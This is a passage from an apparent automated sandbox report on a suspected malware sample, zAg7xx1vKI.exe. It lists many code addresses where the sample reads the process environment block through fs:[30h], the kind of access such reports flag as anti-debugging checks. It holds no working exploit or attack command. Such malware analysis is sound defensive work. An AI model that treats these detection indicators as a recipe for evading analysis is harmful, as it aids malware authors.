Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01130274 mov eax, dword ptr fs:[00000030h]	3_2_01130274
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]	3_2_01084260
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]	3_2_01084260
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084260 mov eax, dword ptr fs:[00000030h]	3_2_01084260
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107826B mov eax, dword ptr fs:[00000030h]	3_2_0107826B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]	3_2_010BE284
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE284 mov eax, dword ptr fs:[00000030h]	3_2_010BE284
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]	3_2_01100283
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]	3_2_01100283
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01100283 mov eax, dword ptr fs:[00000030h]	3_2_01100283
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]	3_2_010902A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010902A0 mov eax, dword ptr fs:[00000030h]	3_2_010902A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov ecx, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011162A0 mov eax, dword ptr fs:[00000030h]	3_2_011162A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0108A2C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0108A2C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0108A2C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0108A2C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A2C3 mov eax, dword ptr fs:[00000030h]	3_2_0108A2C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]	3_2_010902E1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]	3_2_010902E1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010902E1 mov eax, dword ptr fs:[00000030h]	3_2_010902E1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116500 mov eax, dword ptr fs:[00000030h]	3_2_01116500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154500 mov eax, dword ptr fs:[00000030h]	3_2_01154500
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]	3_2_010AE53E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]	3_2_010AE53E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]	3_2_010AE53E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]	3_2_010AE53E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE53E mov eax, dword ptr fs:[00000030h]	3_2_010AE53E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090535 mov eax, dword ptr fs:[00000030h]	3_2_01090535
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088550 mov eax, dword ptr fs:[00000030h]	3_2_01088550
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088550 mov eax, dword ptr fs:[00000030h]	3_2_01088550
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]	3_2_010B656A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]	3_2_010B656A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B656A mov eax, dword ptr fs:[00000030h]	3_2_010B656A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B4588 mov eax, dword ptr fs:[00000030h]	3_2_010B4588
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01082582 mov eax, dword ptr fs:[00000030h]	3_2_01082582
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01082582 mov ecx, dword ptr fs:[00000030h]	3_2_01082582
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE59C mov eax, dword ptr fs:[00000030h]	3_2_010BE59C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]	3_2_011005A7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]	3_2_011005A7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011005A7 mov eax, dword ptr fs:[00000030h]	3_2_011005A7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A45B1 mov eax, dword ptr fs:[00000030h]	3_2_010A45B1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A45B1 mov eax, dword ptr fs:[00000030h]	3_2_010A45B1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE5CF mov eax, dword ptr fs:[00000030h]	3_2_010BE5CF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE5CF mov eax, dword ptr fs:[00000030h]	3_2_010BE5CF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010865D0 mov eax, dword ptr fs:[00000030h]	3_2_010865D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA5D0 mov eax, dword ptr fs:[00000030h]	3_2_010BA5D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA5D0 mov eax, dword ptr fs:[00000030h]	3_2_010BA5D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC5ED mov eax, dword ptr fs:[00000030h]	3_2_010BC5ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC5ED mov eax, dword ptr fs:[00000030h]	3_2_010BC5ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010825E0 mov eax, dword ptr fs:[00000030h]	3_2_010825E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE5E7 mov eax, dword ptr fs:[00000030h]	3_2_010AE5E7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]	3_2_010B8402
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]	3_2_010B8402
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B8402 mov eax, dword ptr fs:[00000030h]	3_2_010B8402
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107C427 mov eax, dword ptr fs:[00000030h]	3_2_0107C427
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]	3_2_0107E420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]	3_2_0107E420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107E420 mov eax, dword ptr fs:[00000030h]	3_2_0107E420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01106420 mov eax, dword ptr fs:[00000030h]	3_2_01106420
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA430 mov eax, dword ptr fs:[00000030h]	3_2_010BA430
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113A456 mov eax, dword ptr fs:[00000030h]	3_2_0113A456
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BE443 mov eax, dword ptr fs:[00000030h]	3_2_010BE443
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A245A mov eax, dword ptr fs:[00000030h]	3_2_010A245A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107645D mov eax, dword ptr fs:[00000030h]	3_2_0107645D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110C460 mov ecx, dword ptr fs:[00000030h]	3_2_0110C460
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]	3_2_010AA470
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]	3_2_010AA470
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AA470 mov eax, dword ptr fs:[00000030h]	3_2_010AA470
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0113A49A mov eax, dword ptr fs:[00000030h]	3_2_0113A49A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110A4B0 mov eax, dword ptr fs:[00000030h]	3_2_0110A4B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010864AB mov eax, dword ptr fs:[00000030h]	3_2_010864AB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B44B0 mov ecx, dword ptr fs:[00000030h]	3_2_010B44B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010804E5 mov ecx, dword ptr fs:[00000030h]	3_2_010804E5
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC700 mov eax, dword ptr fs:[00000030h]	3_2_010BC700
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080710 mov eax, dword ptr fs:[00000030h]	3_2_01080710
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B0710 mov eax, dword ptr fs:[00000030h]	3_2_010B0710
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC720 mov eax, dword ptr fs:[00000030h]	3_2_010BC720
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC720 mov eax, dword ptr fs:[00000030h]	3_2_010BC720
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B273C mov eax, dword ptr fs:[00000030h]	3_2_010B273C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B273C mov ecx, dword ptr fs:[00000030h]	3_2_010B273C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B273C mov eax, dword ptr fs:[00000030h]	3_2_010B273C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FC730 mov eax, dword ptr fs:[00000030h]	3_2_010FC730
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01104755 mov eax, dword ptr fs:[00000030h]	3_2_01104755
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B674D mov esi, dword ptr fs:[00000030h]	3_2_010B674D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B674D mov eax, dword ptr fs:[00000030h]	3_2_010B674D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B674D mov eax, dword ptr fs:[00000030h]	3_2_010B674D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110E75D mov eax, dword ptr fs:[00000030h]	3_2_0110E75D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080750 mov eax, dword ptr fs:[00000030h]	3_2_01080750
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2750 mov eax, dword ptr fs:[00000030h]	3_2_010C2750
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2750 mov eax, dword ptr fs:[00000030h]	3_2_010C2750
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088770 mov eax, dword ptr fs:[00000030h]	3_2_01088770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090770 mov eax, dword ptr fs:[00000030h]	3_2_01090770
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112678E mov eax, dword ptr fs:[00000030h]	3_2_0112678E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010807AF mov eax, dword ptr fs:[00000030h]	3_2_010807AF
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011347A0 mov eax, dword ptr fs:[00000030h]	3_2_011347A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108C7C0 mov eax, dword ptr fs:[00000030h]	3_2_0108C7C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011007C3 mov eax, dword ptr fs:[00000030h]	3_2_011007C3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A27ED mov eax, dword ptr fs:[00000030h]	3_2_010A27ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A27ED mov eax, dword ptr fs:[00000030h]	3_2_010A27ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A27ED mov eax, dword ptr fs:[00000030h]	3_2_010A27ED
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110E7E1 mov eax, dword ptr fs:[00000030h]	3_2_0110E7E1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010847FB mov eax, dword ptr fs:[00000030h]	3_2_010847FB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010847FB mov eax, dword ptr fs:[00000030h]	3_2_010847FB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109260B mov eax, dword ptr fs:[00000030h]	3_2_0109260B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE609 mov eax, dword ptr fs:[00000030h]	3_2_010FE609
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C2619 mov eax, dword ptr fs:[00000030h]	3_2_010C2619
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108262C mov eax, dword ptr fs:[00000030h]	3_2_0108262C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B6620 mov eax, dword ptr fs:[00000030h]	3_2_010B6620
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B8620 mov eax, dword ptr fs:[00000030h]	3_2_010B8620
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109E627 mov eax, dword ptr fs:[00000030h]	3_2_0109E627
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109C640 mov eax, dword ptr fs:[00000030h]	3_2_0109C640
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA660 mov eax, dword ptr fs:[00000030h]	3_2_010BA660
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA660 mov eax, dword ptr fs:[00000030h]	3_2_010BA660
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114866E mov eax, dword ptr fs:[00000030h]	3_2_0114866E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114866E mov eax, dword ptr fs:[00000030h]	3_2_0114866E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B2674 mov eax, dword ptr fs:[00000030h]	3_2_010B2674
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084690 mov eax, dword ptr fs:[00000030h]	3_2_01084690
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084690 mov eax, dword ptr fs:[00000030h]	3_2_01084690
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC6A6 mov eax, dword ptr fs:[00000030h]	3_2_010BC6A6
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B66B0 mov eax, dword ptr fs:[00000030h]	3_2_010B66B0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA6C7 mov ebx, dword ptr fs:[00000030h]	3_2_010BA6C7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA6C7 mov eax, dword ptr fs:[00000030h]	3_2_010BA6C7
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011006F1 mov eax, dword ptr fs:[00000030h]	3_2_011006F1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011006F1 mov eax, dword ptr fs:[00000030h]	3_2_011006F1
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE6F2 mov eax, dword ptr fs:[00000030h]	3_2_010FE6F2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE6F2 mov eax, dword ptr fs:[00000030h]	3_2_010FE6F2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE6F2 mov eax, dword ptr fs:[00000030h]	3_2_010FE6F2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE6F2 mov eax, dword ptr fs:[00000030h]	3_2_010FE6F2
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110C912 mov eax, dword ptr fs:[00000030h]	3_2_0110C912
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE908 mov eax, dword ptr fs:[00000030h]	3_2_010FE908
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FE908 mov eax, dword ptr fs:[00000030h]	3_2_010FE908
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01078918 mov eax, dword ptr fs:[00000030h]	3_2_01078918
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01078918 mov eax, dword ptr fs:[00000030h]	3_2_01078918
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110892A mov eax, dword ptr fs:[00000030h]	3_2_0110892A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0111892B mov eax, dword ptr fs:[00000030h]	3_2_0111892B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01100946 mov eax, dword ptr fs:[00000030h]	3_2_01100946
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C096E mov eax, dword ptr fs:[00000030h]	3_2_010C096E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C096E mov edx, dword ptr fs:[00000030h]	3_2_010C096E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010C096E mov eax, dword ptr fs:[00000030h]	3_2_010C096E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A6962 mov eax, dword ptr fs:[00000030h]	3_2_010A6962
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A6962 mov eax, dword ptr fs:[00000030h]	3_2_010A6962
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A6962 mov eax, dword ptr fs:[00000030h]	3_2_010A6962
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01124978 mov eax, dword ptr fs:[00000030h]	3_2_01124978
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01124978 mov eax, dword ptr fs:[00000030h]	3_2_01124978
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110C97C mov eax, dword ptr fs:[00000030h]	3_2_0110C97C
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011089B3 mov esi, dword ptr fs:[00000030h]	3_2_011089B3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011089B3 mov eax, dword ptr fs:[00000030h]	3_2_011089B3
